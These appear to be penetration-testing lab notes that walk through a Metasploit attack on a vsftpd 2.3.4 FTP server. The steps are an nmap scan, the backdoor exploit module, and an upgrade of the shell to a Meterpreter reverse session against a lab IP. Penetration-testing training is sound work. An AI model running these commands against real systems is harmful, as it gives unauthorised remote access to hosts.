🔬 Vulnerable FTP Server
ip -br -c a
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.80.80.3
setg RHOST 192.80.80.3
workspace -a vsftpd2.3.4
- Perform an
nmap
scan directly into MSF
db_nmap -sS -sV -O 192.80.80.3
![db_nmap -sS -sV -O 192.80.80.3](/syselement/ine-notes/raw/main/ejpt/hostnetwork-penetration-testing/3-metasploit/.gitbook/assets/image-20230416130726833.png)
analyze # error
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
info
# Description:
# This module exploits a malicious backdoor that was added to the
# VSFTPD download archive. This backdoor was introduced into the
# vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
# according to the most recent information available. This backdoor
# was removed on July 3rd 2011.
options
run
![Metasploit - exploit/unix/ftp/vsftpd_234_backdoor](/syselement/ine-notes/raw/main/ejpt/hostnetwork-penetration-testing/3-metasploit/.gitbook/assets/image-20230416131200154.png)
- Shell to
Meterpreter
post exploitation
background
sessions
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 2
set LHOST eth1
run
sessions
sessions 3
![](/syselement/ine-notes/raw/main/ejpt/hostnetwork-penetration-testing/3-metasploit/.gitbook/assets/image-20230416131524452.png)